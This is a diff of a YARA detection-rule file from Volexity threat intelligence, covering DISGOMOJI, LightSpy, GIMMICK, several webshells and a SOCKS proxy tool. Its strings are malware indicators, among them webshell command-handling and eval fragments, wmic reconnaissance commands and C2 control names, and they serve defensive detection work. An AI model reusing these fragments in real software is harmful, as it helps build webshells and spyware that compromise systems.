-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_2 : TRANSPARENTJASMINE FILE MEMORY
-{
-	meta:
-		description = "Detects DISGOMOJI malware using strings in the ELF."
-		author = "threatintel@volexity.com"
-		id = "609beb47-5e93-5f69-b89d-2cf62f20851a"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L72-L103"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "e03a774cca2946c1becdbd775ef465033dae089d578ea18a4f43fd7bdae9168e"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10266
-		version = 9
-
-	strings:
-		$s1 = "downloadFileFromURL" wide ascii
-		$s2 = "createCronJob" wide ascii
-		$s3 = "findAndSendFiles" wide ascii
-		$s4 = "updateLogFile" wide ascii
-		$s5 = "handleZipFile" wide ascii
-		$s6 = "takeScreenshot" wide ascii
-		$s7 = "zipFirefoxProfile" wide ascii
-		$s8 = "zipDirectoryWithParts" wide ascii
-		$s9 = "uploadAndSendToOshi" wide ascii
-		$s10 = "uploadAndSendToLeft" wide ascii
-
-	condition:
-		7 of them
-}
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_1 : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Deepdata_Module : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects GOMOJI malware using strings in the ELF."
+		description = "Detects modules used by DEEPDATA based on the required export names used by those modules."
 		author = "threatintel@volexity.com"
-		id = "f6643e9a-ca41-57e0-9fce-571d340f1cfe"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L104-L131"
+		id = "1287f5dd-9229-57ce-a91a-73d61041df80"
+		date = "2024-07-30"
+		modified = "2024-11-14"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L1-L25"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "dd3535079881ae9cfe25c129803668cb595be89b7f62eb82af19cc3839f92b6d"
+		logic_hash = "d36f34343826daf7f7368118c7127c7181a54c99a01803016c9a6965abb309cb"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "c782346bf9e5c08a0c43a85d4991f26b0b3c99c054fa83beb4a9e406906f011e"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10265
-		version = 7
-
-	strings:
-		$s1 = "Session *%s* opened!" wide ascii
-		$s2 = "uevent_seqnum.sh" wide ascii
-		$s3 = "Error downloading shell script: %v" wide ascii
-		$s4 = "Error setting execute permissions: %v" wide ascii
-		$s5 = "Error executing shell script: %v" wide ascii
-		$s6 = "Error creating Discord session" wide ascii
-
-	condition:
-		4 of them
-}
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Bogus_Strings : TRANSPARENTJASMINE FILE
-{
-	meta:
-		description = "Detects the DISGOMOJI malware using bogus strings introduced in the newer version."
-		author = "threatintel@volexity.com"
-		id = "ecff8d3c-d4fe-5b6d-a227-6ff531cf8e2b"
-		date = "2024-03-14"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L132-L159"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "0d8a2b371ffb182e60a8cc0cc500d1a9f906718a55f23f35f6c12f7faabbe971"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "8c8ef2d850bd9c987604e82571706e11612946122c6ab089bd54440c0113968e"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10341
-		version = 5
+		rule_id = 10868
+		version = 2
 
 	strings:
-		$s1 = "Graphics Display Rendering" wide ascii
-		$s2 = "Error fetching Repository Key: %v" wide ascii
-		$s3 = "Error reading Repository Key: %v" wide ascii
-		$s4 = "Error fetching dpkg: %v" wide ascii
-		$s5 = "GNU Drivers Latest version v1.4.2" wide ascii
-		$s6 = "ps_output.txt" wide ascii
+		$str1 = "ExecuteCommand"
+		$str2 = "GetPluginCommandID"
+		$str3 = "GetPluginName"
+		$str4 = "GetPluginVersion"
 
 	condition:
 		all of them
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Uevent_Seqnum : TRANSPARENTJASMINE FILE
-{
-	meta:
-		description = "Detects a script deployed as part of DISGOMOJI malware chain."
-		author = "threatintel@volexity.com"
-		id = "9df61164-6a92-5042-ba4f-64dc7e998283"
-		date = "2024-03-07"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L160-L187"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "e390e83d9fc15499c9f32ad47d1c526273105602bda7b3532720b0a3f6abc835"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "98b24fb7aaaece7556aea2269b4e908dd79ff332ddaa5111caec49123840f364"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10314
-		version = 6
-
-	strings:
-		$s1 = "USB_DIR=\"/media/$USER\"" wide ascii
-		$s2 = "RECORD_FILE=\"record.txt\"" wide ascii
-		$s3 = "copy_files()" wide ascii
-		$s4 = "Check for connected USB drives" wide ascii
-		$s5 = "Check if filename already exists in record.txt" wide ascii
-		$s6 = "Function to copy files from USB drive to destination folder" wide ascii
-
-	condition:
-		3 of them
-}
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Lan_Conf : TRANSPARENTJASMINE FILE
-{
-	meta:
-		description = "Detects a script deployed as part of DISGOMOJI malware chain."
-		author = "threatintel@volexity.com"
-		id = "b338b3cf-22ce-5767-bdea-503e883bc84b"
-		date = "2024-03-07"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L188-L215"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "2a19d5cff7adc9b1b92538a5df4e3cadea694f925f65080f5093fc5425e840f4"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "0b5cf9bd917f0af03dd694ff4ce39b0b34a97c9f41b87feac1dc884a684f60ef"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10312
-		version = 7
-
-	strings:
-		$s1 = "add_lan_conf_cron_if_not_exists" wide ascii
-		$s2 = "download_if_not_exists" wide ascii
-		$s3 = "add_cron_if_not_exists" wide ascii
-		$s4 = "uevent_seqnum.sh" wide ascii
-		$s5 = "$HOME/.x86_64-linux-gnu" wide ascii
-		$s6 = "lanConfScriptPath" wide ascii
-
-	condition:
-		4 of them
-}
-rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy_1 : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_Core : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects a opensource malware available on github using strings in the binary. The DISGOMOJI malware family used by TransparentJasmine is based on this malware."
+		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
 		author = "threatintel@volexity.com"
-		id = "6816d264-4311-5e90-948b-2e27cdf0b720"
-		date = "2024-03-28"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L216-L243"
+		id = "44f8d7a4-7f48-5960-91a7-baf475f7d291"
+		date = "2024-02-15"
+		modified = "2024-07-03"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L244-L287"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "22b3e5109d0738552fbc310344b2651ab3297e324bc883d5332c1e8a7a1df29b"
+		logic_hash = "f0189c0a84c53e365130e9683f2f2b2f73c14412d8e4d0251a4780d0e80162d8"
 		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "de32e96d1f151cc787841c12fad88d0a2276a93d202fc19f93631462512fffaf"
-		os = "all"
+		quality = 78
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10390
-		version = 3
+		rule_id = 10246
+		version = 2
 
 	strings:
-		$s1 = "File is bigger than 8MB" wide ascii
-		$s2 = "Uploaded file to" wide ascii
-		$s3 = "sess-%d" wide ascii
-		$s4 = "Session *%s* opened" wide ascii
-		$s5 = "%s%d_%dx%d.png" wide ascii
+		$s1 = "Enter RunWork......."
+		$s2 = "it's running......."
+		$s3 = "select ret = socket_error."
+		$s4 = "%s\\\\account.bin"
+		$s5 = "[CtrlLink]: get machine sn err:%d"
+		$s6 = "wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /format:list | findstr /v \\\"^$\\\""
+		$s7 = "wmic csproduct get vendor,version /format:list | findstr /v \\\"^$\\\""
+		$s8 = "local ip get sockname error=%d"
+		$s9 = "connect goole dns error=%d"
+		$s10 = "%s/api/terminal/upsert/"
+		$s11 = "/963852741/windows/plugin/manifest"
+		$s12 = "Hello deepdata."
+		$s13 = "Start Light."
+		$s14 = "InitialPluginManager Error."
+		$s15 = "InitialCommandExe Error."
+		$s16 = "ws open, and send logon info."
+		$s17 = "plugin_replay_handler"
+		$s18 = "light_x86.dll"
+		$pdb1 = "\\light\\bin\\light_x86.pdb"
+		$pdb2 = "\\light\\bin\\plugin"
+		$pdb3 = "D:\\tmpWork\\"
 
 	condition:
-		4 of them
+		1 of ( $pdb* ) or 5 of ( $s* )
 }
-rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_C2_Strings : BRAZENBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects a opensource malware available on github using strings in the binary. DISGOMOJI used by TransparentJasmine is based on this malware."
+		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
 		author = "threatintel@volexity.com"
-		id = "1ddbf476-ba2d-5cbb-ad95-38e0ae8db71b"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "https://github.com/bmdyy/discord-c2"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L244-L267"
+		id = "a0af8fb7-13a3-54e8-8569-e8622fa80d89"
+		date = "2024-02-15"
+		modified = "2024-11-14"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L288-L337"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "38b860a43b9937351f74b01983888f18ad101cbe66560feb7455d46b713eba0f"
+		logic_hash = "eeaaf6e16d4854a2279bd62596f75cb8b8ec1b05f3b050f5dac97254704b9005"
 		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "all"
+		quality = 78
+		tags = "BRAZENBAMBOO, FILE, MEMORY"
+		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10264
-		version = 12
+		rule_id = 10245
+		version = 4
 
 	strings:
-		$s1 = "**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**" wide ascii
+		$s1 = "[WsClient][Error]:"
+		$s2 = "[WsClient][Info]:"
+		$s3 = "[WsClient]:WsClient"
+		$s4 = "[WsClient][Info]:Ws"
+		$s5 = "WsClient Worker Thread ID=%d"
+		$s6 = "[LightWebClient]:"
+		$s7 = "LightHttpGet err:%s"
+		$s8 = "User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36"
+		$s9 = "KvList Err:%s"
+		$s10 = "dataMultiPart malloc err:%d"
+		$ctrl1 = "CTRL_HEART_BEAT"
+		$ctrl2 = "CTRL_NET_CONFIG"
+		$ctrl3 = "CTRL_COMMAND_PLAN"
+		$ctrl4 = "CTRL_MODIFY_NET_CONFIG"
+		$ctrl5 = "CTRL_UPLOAD_PLUGIN_STATUS"
+		$ctrl6 = "CTRL_PLUGIN_EXECUTE_COMMAND"
+		$ctrl7 = "CTRL_PLUGIN_COMMAND_STATUS"
+		$ctrl8 = "CTRL_PLUGIN_STOP_COMMAND"
+		$ctrl9 = "CTRL_GET_SLEEP_CONFIG"
+		$ctrl10 = "CTRL_MODIFY_SLEEP_CONFIG"
+		$ctrl11 = "CTRL_SLEEP_STATUS"
+		$ctrl12 = "CTRL_UPDATE_PLUGIN"
+		$ctrl13 = "CTRL_DESTROY"
+		$ctrl14 = "CTRL_RECONFIG_REBOUNT_ADDRESS"
+		$ctrl15 = "CTRL_AUTO_UPLOUD_FILE_CONFIG"
+		$ctrl16 = "CTRL_UPLOUD_DEVICE_INFO"
+		$ctrl17 = "CTRL_TEST_VPDN_ACCOUNT"
 
 	condition:
-		$s1
+		3 of ( $s* ) or 5 of ( $ctrl* )
 }
 rule VOLEXITY_Apt_Malware_Any_Reloadext_Plugin : STORMBAMBOO FILE MEMORY
 {
@@ -162446,64 +162900,6 @@ rule VOLEXITY_Apt_Malware_Any_Macma_A : STORMBAMBOO FILE MEMORY
 	condition:
 		any of ( $magic* ) or 7 of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY
-{
-	meta:
-		description = "Detects the macOS port of the GIMMICK malware."
-		author = "threatintel@volexity.com"
-		id = "3d485788-4aab-511b-a49e-5dc09d1950a9"
-		date = "2021-10-18"
-		modified = "2024-08-02"
-		reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-08-02 StormBamboo/rules.yar#L112-L170"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467"
-		score = 75
-		quality = 78
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f"
-		os = "darwin"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6022
-		version = 8
-
-	strings:
-		$s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii
-		$json1 = "base_json" ascii wide
-		$json2 = "down_json" ascii wide
-		$json3 = "upload_json" ascii wide
-		$json4 = "termin_json" ascii wide
-		$json5 = "request_json" ascii wide
-		$json6 = "online_json" ascii wide
-		$json7 = "work_json" ascii wide
-		$msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide
-		$msg2 = "pid %d is dead" ascii wide
-		$msg3 = "exit with code %d" ascii wide
-		$msg4 = "recv signal %d" ascii wide
-		$cmd1 = "ReadCmdQueue" ascii wide
-		$cmd2 = "read_cmd_server_timer" ascii wide
-		$cmd3 = "enableProxys" ascii wide
-		$cmd4 = "result_block" ascii wide
-		$cmd5 = "createDirLock" ascii wide
-		$cmd6 = "proxyLock" ascii wide
-		$cmd7 = "createDirTmpItem" ascii wide
-		$cmd8 = "dowfileLock" ascii wide
-		$cmd9 = "downFileTmpItem" ascii wide
-		$cmd10 = "filePathTmpItem" ascii wide
-		$cmd11 = "uploadItems" ascii wide
-		$cmd12 = "downItems" ascii wide
-		$cmd13 = "failUploadItems" ascii wide
-		$cmd14 = "failDownItems" ascii wide
-		$cmd15 = "downloadCmds" ascii wide
-		$cmd16 = "uploadFiles" ascii wide
-		$cmd17 = "bash callback...." ascii wide
-
-	condition:
-		$s1 or 5 of ( $json* ) or 3 of ( $msg* ) or 9 of ( $cmd* )
-}
 rule VOLEXITY_Apt_Malware_Win_Dustpan_Apihashes : STORMBAMBOO FILE
 {
 	meta:
@@ -162689,900 +163085,451 @@ rule VOLEXITY_Apt_Malware_Elf_Catchdns_Aug20_Memory : DRIFTINGBAMBOO FILE MEMORY
 		$netw11 = "configfile" ascii wide
 		$apache = "HTTP/1.1 200 OK\r\nServer: Apache\r\nConnection: close\r\nContent-Type: %s\r\nContent-Length: %d\r\n"
 		$cpp1 = "src/os.cpp"
-		$cpp2 = "src/test_catch_dns.cpp"
-
-	condition:
-		9 of ( $os* ) or 3 of ( $msg* ) or all of ( $conf* ) or all of ( $netw* ) or $apache or all of ( $cpp* )
-}
-rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY
-{
-	meta:
-		description = "Detection for the COMPLYSHELL webshell."
-		author = "threatintel@volexity.com"
-		id = "6b44b5bc-a75f-573c-b9c3-562b7874e408"
-		date = "2023-12-13"
-		modified = "2024-01-12"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L3-L25"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5"
-		score = 75
-		quality = 80
-		tags = "UTA0178, FILE, MEMORY"
-		hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9995
-		version = 4
-
-	strings:
-		$s = "eval{my $c=Crypt::RC4->new("
-
-	condition:
-		$s
-}
-
-rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY
-{
-	meta:
-		description = "Detection for a custom webshell seen on Exchange server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."
-		author = "threatintel@volexity.com"
-		id = "2f07748a-a52f-5ac7-9d3e-50fd3ecea271"
-		date = "2023-12-12"
-		modified = "2024-09-30"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L26-L52"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "6b8183ac1e87a86c58760db51f767ed278cc0c838ed89e7435af7d0373e58b26"
-		score = 75
-		quality = 30
-		tags = "UTA0178, FILE, MEMORY"
-		hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9994
-		version = 6
-
-	strings:
-		$s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii
-		$re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/
-
-	condition:
-		for any i in ( 0 .. math.min ( #s1 , 100 ) ) : ( $re in ( @s1 [ i ] .. @s1 [ i ] + 512 ) )
-}
-rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY
-{
-	meta:
-		description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."
-		author = "threatintel@volexity.com"
-		id = "02365a30-769e-5c47-8d36-a79608ffd121"
-		date = "2018-08-29"
-		modified = "2024-01-09"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L53-L86"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"
-		logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca"
-		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 410
-		version = 7
-
-	strings:
-		$a1 = "every office needs a tool like Georg" ascii
-		$a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii
-		$a3 = "exKak.Message" ascii
-		$proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"
-		$proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii
-		$proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii
-		$proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii
-
-	condition:
-		any of ( $a* ) or $proxy1 or all of ( $proxy_b* )
-}
-rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY
-{
-	meta:
-		description = "SOCKS5 proxy tool used to relay connections."
-		author = "threatintel@volexity.com"
-		id = "88094b55-784d-5245-9c40-b1eebf0e6e72"
-		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "TIB-20240109"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L87-L114"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2"
-		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"
-		os = "all"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10065
-		version = 3
-
-	strings:
-		$s1 = "proxy_loop" ascii
-		$s2 = "connect_to_dst" ascii
-		$s3 = "request_client" ascii
-		$s4 = "subnegotiation_client" ascii
-		$s5 = "bind_port" ascii
-
-	condition:
-		all of them
-}
-rule VOLEXITY_Apt_Malware_Win_Deepdata_Module : BRAZENBAMBOO FILE MEMORY
-{
-	meta:
-		description = "Detects modules used by DEEPDATA based on the required export names used by those modules."
-		author = "threatintel@volexity.com"
-		id = "1287f5dd-9229-57ce-a91a-73d61041df80"
-		date = "2024-07-30"
-		modified = "2024-11-14"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L1-L25"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "d36f34343826daf7f7368118c7127c7181a54c99a01803016c9a6965abb309cb"
-		score = 75
-		quality = 80
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "c782346bf9e5c08a0c43a85d4991f26b0b3c99c054fa83beb4a9e406906f011e"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10868
-		version = 2
-
-	strings:
-		$str1 = "ExecuteCommand"
-		$str2 = "GetPluginCommandID"
-		$str3 = "GetPluginName"
-		$str4 = "GetPluginVersion"
-
-	condition:
-		all of them
-}
-rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_Core : BRAZENBAMBOO FILE MEMORY
-{
-	meta:
-		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
-		author = "threatintel@volexity.com"
-		id = "44f8d7a4-7f48-5960-91a7-baf475f7d291"
-		date = "2024-02-15"
-		modified = "2024-07-03"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-11-15 BrazenBamboo/rules.yar#L244-L287"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "f0189c0a84c53e365130e9683f2f2b2f73c14412d8e4d0251a4780d0e80162d8"
-		score = 75
-		quality = 78
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10246
-		version = 2
-
-	strings:
-		$s1 = "Enter RunWork......."
-		$s2 = "it's running......."
-		$s3 = "select ret = socket_error."
-		$s4 = "%s\\\\account.bin"
-		$s5 = "[CtrlLink]: get machine sn err:%d"
-		$s6 = "wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /format:list | findstr /v \\\"^$\\\""
-		$s7 = "wmic csproduct get vendor,version /format:list | findstr /v \\\"^$\\\""
-		$s8 = "local ip get sockname error=%d"
-		$s9 = "connect goole dns error=%d"
-		$s10 = "%s/api/terminal/upsert/"
-		$s11 = "/963852741/windows/plugin/manifest"
-		$s12 = "Hello deepdata."
-		$s13 = "Start Light."
-		$s14 = "InitialPluginManager Error."
-		$s15 = "InitialCommandExe Error."
-		$s16 = "ws open, and send logon info."
-		$s17 = "plugin_replay_handler"
-		$s18 = "light_x86.dll"
-		$pdb1 = "\\light\\bin\\light_x86.pdb"
-		$pdb2 = "\\light\\bin\\plugin"
-		$pdb3 = "D:\\tmpWork\\"
-
-	condition:
-		1 of ( $pdb* ) or 5 of ( $s* )
-}
